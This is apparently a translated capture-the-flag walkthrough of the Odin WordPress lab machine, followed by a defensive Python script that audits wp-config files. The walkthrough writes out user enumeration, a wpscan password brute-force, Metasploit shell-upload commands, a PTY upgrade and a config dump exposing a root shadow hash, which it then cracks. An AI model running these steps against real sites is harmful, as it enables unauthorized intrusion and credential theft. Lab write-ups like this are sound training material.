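"I want to become strong. One day I will be as strong as Uncle!" - Tianming
Slowly restoring articles I had previously deleted... in remembrance
View the challenge description
A rough translation: a guy named Odin went to some godforsaken place, where someone called mimi had him drink from a well; Odin then went blind in his left eye and was told this was the price of gaining knowledge...
Hmm, that doesn't seem to have much to do with solving the challenge, but the hint below suggests the hosts file needs to be changed
OK, let's get started
Start the target machine
Start Kali
Check the local IP
Host discovery
Information gathering on the target
Only port 80 is open, so try visiting it
What comes up is not the target's real address
Following the hint in the challenge, edit the local hosts file
Visit again; this time it redirects to the proper page
This familiar page looks a lot like a WordPress site. (In fact, our earlier nmap scan had already detected that the target is a WordPress site.)
Try the default WordPress login page, wp-admin
It is indeed a WordPress site, so without further ado, run wpscan against it
The direct vulnerability scan found nothing, so go back to the login page
Try testing for weak passwords
Enter admin as the username and type a random password
Message: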
Error: The password you entered for the username admin is incorrect.
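Well, this confirms that the admin user exists, so account enumeration is possible here
wpscan happens to provide a brute-force feature for accounts, so give wpscan another go
Woohoo, got the password
Log in to the admin dashboard
Do a quick search for known vulnerabilities
There don't seem to be any high-risk vulnerabilities for WP 5.5, so I won't go for getshell via file upload
We already have the username and password, so consider using msf to get a reverse shell directly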
msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set RHOSTS odin
set username admin
set password qwerty
run
shell
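Check basic system information
Use python3 to upgrade to an interactive shell (this spawns a PTY; privileges do not change at this step)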
python3 -c "import pty;pty.spawn('/bin/bash')"
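Post-exploitation begins: look for information about root
Start with the website directory, where there is a relevant configuration file
Print it out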
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'joomla' );
/** MySQL database username */
define( 'DB_USER', 'joomla' );
/** MySQL database password */
define( 'DB_PASSWORD', 'joomla' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'hJ6K`1Lh|p>fc/)&[~yFq~fyW|aIt/aN(t4D{f4q/j.R6[|CNgW{Jgz(,w+L#[3D' );
define( 'SECURE_AUTH_KEY', '$NY`wt7VU18-FcJC/|~c*NKy*EJ,]:6jS_ShC20hpZnUhV%+0.=-=PaM_5%shx%f' );
define( 'LOGGED_IN_KEY', 'A6R.i/vfrs*.i-e[(Elb*hD}S bV;<%bjd,!${8PRhDl+a0}X:9Y4% 6CJ,]tazm' );
define( 'NONCE_KEY', '7B01IEuF=J}ep]`k*oy]{/*L)2O=U5LVJR+YioC?|!~KGdv-b/_ |VmHF[hC: un' );
define( 'AUTH_SALT', '7#xk&!&`({X!1nF#jkWiXu$s7<{]vrl_n:n.R!9qy%@l1rDglP&HpB)G{bPdz>mV' );
define( 'SECURE_AUTH_SALT', '$KC6{ex+{<*Q:%T:U.`=YHg>`f!:[email protected]%twt2_z=P(([email protected]=q-5e$vg' );
define( 'LOGGED_IN_SALT', '6gs|[email protected]?&8NkX:u< F=v^sCcd/CJ#YiI-H*^ OC/SBC6XBh?cRYN(;J3_?3=' );
define( 'NONCE_SALT', 'xA+mKYMD;][email protected]>tEi%MT1!<$|<[email protected]|y2WAE=NwR5{3:piVlWHr6JsK[6u' );
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
/** root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7:::*/
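After some searching, we find the root user's hashed password (the shadow-format line in the comment at the end of the file)
Bring out the go-to tool, John the Ripper (john)!
Obtained the root password: jasmine
Use the password we obtained to switch to root
After some looking around, the author's name, bjorn, turns up in the home directory; printing it out gives the flag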
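A defender-side check for the two weaknesses visible in the wp-config.php dump above (a DB password identical to the DB user, and a shadow-format hash left in a comment), as an added Python example that is not part of the original write-up. The function name audit_wp_config, the finding labels and both sample configs are constructed for illustration.

```python
import re

# crypt(3)-style hash as stored in /etc/shadow: $id$salt$digest
CRYPT_RE = re.compile(r"\$(?:1|5|6|2[aby]|y)\$[./A-Za-z0-9$=,]{20,}")
# define( 'NAME', 'value' ) as written in wp-config.php
DEFINE_RE = re.compile(r"define\(\s*'([A-Z_]+)'\s*,\s*'((?:[^'\\]|\\.)*)'\s*\)")
SECRETS = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
           "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")
PLACEHOLDER = "put your unique phrase here"  # value shipped in wp-config-sample.php


def audit_wp_config(text):
    """Return a list of (finding, detail) tuples for one wp-config.php body."""
    findings = []
    consts = dict(DEFINE_RE.findall(text))
    pw = consts.get("DB_PASSWORD")
    if pw is not None and pw in ("", consts.get("DB_USER"), consts.get("DB_NAME")):
        findings.append(("weak-db-password", "empty or same as DB_USER/DB_NAME"))
    for name in SECRETS:
        if consts.get(name, PLACEHOLDER) == PLACEHOLDER:
            findings.append(("default-secret", name))
    for lineno, line in enumerate(text.splitlines(), 1):
        # Drop define() values first: random salts may contain '$' runs.
        if CRYPT_RE.search(DEFINE_RE.sub("", line)):
            findings.append(("embedded-password-hash", f"line {lineno}"))
    return findings


# Constructed samples (not the page's file): a weak config and a corrected one.
FAKE_HASH = "$6$" + "s" * 16 + "$" + "h" * 86  # constructed, not a real hash
_keys = "".join(f"define( '{n}', 'constructed-random-{i}' );\n"
                for i, n in enumerate(SECRETS))
WEAK = ("<?php\ndefine( 'DB_NAME', 'blog' );\ndefine( 'DB_USER', 'blog' );\n"
        "define( 'DB_PASSWORD', 'blog' );\n"
        + _keys.replace("constructed-random-0", PLACEHOLDER)
        + f"/** root:{FAKE_HASH}:18600:0:99999:7::: */\n")
HARDENED = ("<?php\ndefine( 'DB_NAME', 'blog' );\ndefine( 'DB_USER', 'blog_rw' );\n"
            "define( 'DB_PASSWORD', 'constructed-long-random-value' );\n" + _keys)

if __name__ == "__main__":
    for label, body in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit_wp_config(body))
```
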